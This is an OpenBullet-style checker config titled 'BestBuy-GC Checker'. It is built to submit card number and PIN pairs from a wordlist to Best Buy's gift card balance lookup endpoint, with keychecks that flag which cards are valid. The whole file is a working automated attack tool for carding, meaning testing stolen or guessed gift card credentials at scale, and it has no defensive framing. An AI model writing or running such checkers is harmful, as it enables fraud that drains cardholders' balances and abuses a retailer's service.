[SETTINGS]
{
  "Name": "BestBuy-GC Checker",
  "SuggestedBots": 1,
  "LastModified": "2019-03-08T04:07:45.5245+07:00",
  "AdditionalInfo": "",
  "Author": "1-EvilBear-1",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://www.bestbuy.com/gift-card-balance/api/lookup" AutoRedirect=TRUE 
  CONTENT "{\"cardNumber\":\"<USER>\",\"pin\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "x-user-interface: DotCom-Optimized" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "gift card number or PIN you entered is not valid. Please try again" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "gift card number or PIN you entered is not valid. Please try again" 
